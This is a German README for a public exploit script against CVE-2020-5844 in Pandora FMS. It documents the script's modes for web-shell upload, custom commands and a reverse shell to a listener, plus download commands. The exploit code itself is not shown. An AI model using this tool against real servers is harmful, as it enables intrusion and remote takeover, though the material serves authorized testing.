
Exploit für CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remotecodeausführung

Gefällt dir dieses Repository? Gib uns einen ⭐!
Nur für Bildungs- und autorisierte Sicherheitsforschungszwecke.
@UNICORDev von (@NicPWNs und @Dev-Yeoj)
index.php?sec=godmode/extensions&sec2=extensions/files_repo in Pandora FMS v7.0 NG ermöglicht authentifizierten Administratoren das Hochladen bösartiger PHP-Skripte und deren Ausführung durch Base64-Dekodierung des Dateispeicherorts. Dies betrifft v7.0NG.742_FIX_PERL2020.
Verwenden Sie diesen Exploit für Remote-Code-Ausführung auf verwundbaren Versionen von Pandora FMS. Erfordert eine Ziel-IP-Adresse und einen Ziel-Port. Erfordert gültige Benutzername/Passwort oder gültige PHPSESSID-Cookie-Authentifizierung. Führen Sie im Standardmodus aus, um eine grundlegende PHP-Web-Shell hochzuladen. Führen Sie im benutzerdefinierten Befehlsmodus aus, um einen benutzerdefinierten Befehl auf dem Ziel auszuführen. Führen Sie im Reverse-Shell-Modus aus, um eine Reverse-Shell vom Ziel auf einem von Ihnen eingerichteten Listener zu empfangen. Führen Sie im Web-Shell-Benutzermodus aus, um den Namen der PHP-Web-Shell-Datei zu ändern.
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]
python3 exploit-CVE-2020-5844.py -h
-t Ziel-Host und Port. Geben Sie die Ziel-IP-Adresse und den Port an.
-u Ziel-Benutzername und Passwort. Geben Sie Benutzername und Passwort an, um sich bei Pandora FMS anzumelden.
-p Gültige PHP-Sitzungs-ID des Ziels. Kein Benutzername oder Passwort erforderlich. (Optional)
-s Reverse-Shell-Modus. Geben Sie die lokale IP-Adresse und den lokalen Port an. (Optional)
-c Benutzerdefinierter Befehlsmodus. Geben Sie den auszuführenden Befehl an. (Optional)
-w Web-Shell-Benutzermodus. Geben Sie einen benutzerdefinierten PHP-Dateinamen an. (Optional)
-h Zeigt dieses Hilfemenü an.
Laden Sie exploit-CVE-2020-5844.py von GitHub herunter
Laden Sie exploit-CVE-2020-5844.py von ExploitDB herunter
searchsploit -u
searchsploit -m 50961
Pandora FMS v7.0NG.742




